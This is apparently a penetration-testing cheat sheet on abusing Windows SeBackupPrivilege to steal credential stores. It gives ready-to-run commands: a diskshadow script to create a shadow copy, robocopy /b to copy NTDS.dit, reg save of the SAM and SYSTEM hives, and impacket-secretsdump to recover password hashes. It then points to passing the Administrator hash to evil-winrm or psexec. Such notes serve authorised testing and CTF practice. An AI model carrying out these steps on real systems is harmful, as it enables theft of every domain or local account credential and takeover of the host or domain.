SeBackupPrivilege — Dump SAM/SYSTEM (or NTDS)
privescwindowstool
Summary
SeBackupPrivilege lets you read any file regardless of ACLs. Use a shadow copy to grab NTDS.dit (on a DC) or save the SAM/SYSTEM hives, then dump hashes offline with secretsdump.
Walkthrough
SeBackupPrivilege grants the right to read any file on disk, ignoring its ACL (intended for backup software). That is enough to steal the hash stores.
On a Domain Controller — steal NTDS.dit
- Write
viper.dshon Kali, thenunix2dos viper.dshso diskshadow accepts it. - Transfer it to the target and run
diskshadow /s viper.dshto create a
shadow copy exposed as x:.
robocopy /bcopiesntds.ditoff the shadow copy — the/b(backup) flag
is what abuses the privilege.
- Also save the
SYSTEMhive (needed to decrypt NTDS).
On a member/standalone host — steal SAM
reg savetheSAMandSYSTEMhives to a writable folder, exfil them, then
run secretsdump locally to recover local account hashes.
Pass the resulting Administrator hash to evil-winrm or psexec.
Commands
other
# viper.dsh (create on Kali, then convert line endings) set context persistent nowriters add volume c: alias viper create expose %viper% x:
bash
unix2dos viper.dsh
cmd
# On target: run the shadow-copy script diskshadow /s viper.dsh
cmd
# Copy NTDS.dit off the shadow copy (backup flag bypasses ACLs) robocopy /b x:\windows\ntds . ntds.dit
cmd
# Or, on a normal box, grab the SAM + SYSTEM hives reg save hklm\system C:\windows\tasks\system reg save hklm\sam C:\windows\tasks\sam
bash
# Extract hashes offline impacket-secretsdump -ntds ntds.dit -system system local impacket-secretsdump -sam sam -system system local